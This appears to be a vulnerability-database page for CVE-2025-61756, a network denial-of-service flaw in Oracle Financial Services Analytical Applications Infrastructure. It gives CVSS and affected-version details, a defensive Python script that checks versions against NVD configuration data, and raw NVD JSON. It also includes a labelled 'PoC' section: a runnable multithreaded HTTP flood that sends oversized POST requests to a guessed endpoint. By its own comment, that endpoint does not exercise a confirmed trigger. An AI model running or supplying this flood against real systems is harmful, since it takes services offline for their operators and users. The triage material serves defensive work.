Security Vulnerability Report

CVE-2025-61756 CVSS 7.5 HIGH

Published: 2025-10-21 23:17:09
Last Modified: 2025-10-24 13:19:32

Description

Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: System Configuration). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Exploitability / Impact sub-scores: 3.9 / 3.6
Weakness (NVD, secondary): CWE-306 Missing Authentication for Critical Function

The vector says everything a triager needs: reachable over the network (AV:N), no special conditions (AC:L), no credentials or user interaction (PR:N, UI:N), and the only impact is availability (C:N/I:N/A:H), which is what caps an otherwise trivially exploitable bug at 7.5 rather than higher.

Configurations (Affected Products)

Oracle Financial Services Analytical Applications Infrastructure 8.0.7.9
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:* - VULNERABLE
Oracle Financial Services Analytical Applications Infrastructure 8.0.8.7
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:* - VULNERABLE
Oracle Financial Services Analytical Applications Infrastructure 8.1.2.5
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:* - VULNERABLE

Only these three exact versions are enumerated (no version ranges), and the CPE strings carry a trailing ".0" (8.0.7.9.0) that the advisory's own version numbers (8.0.7.9) do not, so inventory matching has to normalise the two forms. No fixed version is given in this record; the fix is delivered through the Oracle Critical Patch Update (October 2025) advisory listed in the record's references.
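The following is an added example (not NVD's or Oracle's code) of matching an installed product version against the configuration block above. The embedded record is a constructed excerpt of the JSON on this page, reduced to its configurations. The example goes beyond this record: besides exact-version criteria it also handles the wildcard-version criteria with versionStartIncluding/versionEndExcluding bounds that NVD API 2.0 uses for ranged advisories, and it normalises the trailing ".0" so that "8.0.7.9" matches the CPE's "8.0.7.9.0".

```python
"""Match an installed product/version against the NVD configuration nodes of a CVE record."""

# Constructed excerpt of the NVD 2.0 record on this page: just the configurations block.
NVD_RECORD = {
    "configurations": [
        {
            "nodes": [
                {
                    "operator": "OR",
                    "negate": False,
                    "cpeMatch": [
                        {"vulnerable": True, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:*"},
                        {"vulnerable": True, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:*"},
                        {"vulnerable": True, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:*"},
                    ],
                }
            ]
        }
    ]
}

CPE_FIELDS = ("part", "vendor", "product", "version", "update", "edition",
              "language", "sw_edition", "target_sw", "target_hw", "other")


def parse_cpe23(cpe):
    """Split a CPE 2.3 formatted string into its named components.
    A colon escaped with a backslash is part of a value, not a separator."""
    parts, cur, i = [], "", 0
    while i < len(cpe):
        if cpe[i] == "\\" and i + 1 < len(cpe):
            cur += cpe[i:i + 2]
            i += 2
            continue
        if cpe[i] == ":":
            parts.append(cur)
            cur = ""
        else:
            cur += cpe[i]
        i += 1
    parts.append(cur)
    if len(parts) != 13 or parts[0] != "cpe" or parts[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 formatted string: {cpe!r}")
    return dict(zip(CPE_FIELDS, parts[2:]))


def version_key(version):
    """Comparable tuple for dotted versions. Numeric parts compare numerically and
    trailing zero parts are dropped, so '8.0.7.9' equals the CPE form '8.0.7.9.0'."""
    comps = [(0, int(c)) if c.isdigit() else (1, c) for c in version.split(".")]
    while len(comps) > 1 and comps[-1] == (0, 0):
        comps.pop()
    return tuple(comps)


def cpe_match_applies(match, vendor, product, version):
    """Does one NVD cpeMatch entry cover vendor/product/version? Handles exact-version
    criteria and wildcard criteria with versionStart*/versionEnd* range bounds."""
    c = parse_cpe23(match["criteria"])
    if c["vendor"] != vendor or c["product"] != product:
        return False
    v = version_key(version)
    if c["version"] not in ("*", "-"):
        return v == version_key(c["version"])
    lo_inc, lo_exc = match.get("versionStartIncluding"), match.get("versionStartExcluding")
    hi_inc, hi_exc = match.get("versionEndIncluding"), match.get("versionEndExcluding")
    if lo_inc and v < version_key(lo_inc):
        return False
    if lo_exc and v <= version_key(lo_exc):
        return False
    if hi_inc and v > version_key(hi_inc):
        return False
    if hi_exc and v >= version_key(hi_exc):
        return False
    return True


def evaluate_node(node, vendor, product, version):
    """Evaluate one configuration node: OR/AND over its cpeMatch entries, then negate.
    A node whose entries are all vulnerable:false is a platform ('running on')
    condition; this product-only triage treats such a node as satisfied."""
    matches = node.get("cpeMatch", [])
    if not any(m.get("vulnerable") for m in matches):
        return True
    hits = [m.get("vulnerable", False) and cpe_match_applies(m, vendor, product, version)
            for m in matches]
    result = all(hits) if node.get("operator") == "AND" else any(hits)
    return (not result) if node.get("negate") else result


def is_affected(record, vendor, product, version):
    """True if any configuration lists the product/version as vulnerable. Configurations
    are OR'd; nodes inside one are AND'd only when it carries operator AND (NVD API 2.0)."""
    for config in record.get("configurations", []):
        results = [evaluate_node(n, vendor, product, version) for n in config.get("nodes", [])]
        if all(results) if config.get("operator") == "AND" else any(results):
            return True
    return False


if __name__ == "__main__":
    prod = "financial_services_analytical_applications_infrastructure"
    for ver in ("8.0.7.9", "8.0.8.7", "8.1.2.5", "8.1.2.6"):
        print(ver, "AFFECTED" if is_affected(NVD_RECORD, "oracle", prod, ver) else "not listed")
```

"Not listed" is not "fixed": because this record enumerates exact versions only, a deployment on 8.1.2.4 or 8.1.2.6 is simply outside what NVD has asserted, and the Oracle advisory remains the authority on which patch levels contain the fix.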

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61756 - Oracle Financial Services Analytical Applications Infrastructure DoS PoC
# Vulnerability: Unauthenticated Denial of Service via System Configuration Component
# CVSS: 7.5 (HIGH) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
# Affected Versions: 8.0.7.9, 8.0.8.7, 8.1.2.5
#
# Caveat: the Oracle Critical Patch Update advisory does not disclose the affected
# endpoint or request format. The endpoint and parameter names below are this
# script's own assumptions, not taken from the advisory, and what the script does
# is a plain concurrent request flood; it does not exercise a confirmed trigger.
import sys
import time
from concurrent.futures import ThreadPoolExecutor

import requests

# Target base URL can be passed as the first argument; default is a placeholder.
TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-host:port"
CONFIG_ENDPOINT = "/analytics/saw.dll?Dashboard"  # assumed path, not from the advisory
NUM_THREADS = 50
REQUESTS_PER_THREAD = 100


def send_malicious_request(session, thread_id):
    """Send repeated crafted HTTP POSTs from one worker thread."""
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; DoS-PoC)",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "*/*",
    }
    # Payload aimed at the System Configuration component (parameter names assumed)
    payload = {
        "op": "configure",
        "cmd": "refresh",
        "_scid": "A" * 10000,  # oversized value intended to consume server resources
        "locale": "en_US",
        "r": str(thread_id),
    }
    # rstrip avoids a double slash when TARGET_URL ends with "/"
    url = TARGET_URL.rstrip("/") + CONFIG_ENDPOINT
    for i in range(REQUESTS_PER_THREAD):
        try:
            response = session.post(url, data=payload, headers=headers, timeout=10)
            print(f"[Thread-{thread_id}] Request {i+1}: Status {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[Thread-{thread_id}] Request {i+1} failed: {e}")
        time.sleep(0.1)


def main():
    print(f"[*] Starting DoS attack against {TARGET_URL}")
    print(f"[*] Using {NUM_THREADS} concurrent threads")
    # One Session per worker so connections are not shared across threads.
    sessions = [requests.Session() for _ in range(NUM_THREADS)]
    with ThreadPoolExecutor(max_workers=NUM_THREADS) as executor:
        for thread_id in range(NUM_THREADS):
            executor.submit(send_malicious_request, sessions[thread_id], thread_id)
    # Leaving the 'with' block waits for every worker to finish.
    print("[*] Attack completed. Check target availability.")


if __name__ == "__main__":
    main()

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory, Oracle Critical Patch Update, October 2025)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61756",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T23:17:08.653",
    "lastModified": "2025-10-24T13:19:32.327",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: System Configuration). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "01413F8D-9A00-4D47-AEFC-B214F24DF7E6"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "99758374-009C-4AD2-8402-F8F0ACE6B289"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "93333ABD-DCF3-46E6-8053-36B62D7431A3"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.oracle.com/security-alerts/cpuoct2025.html",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}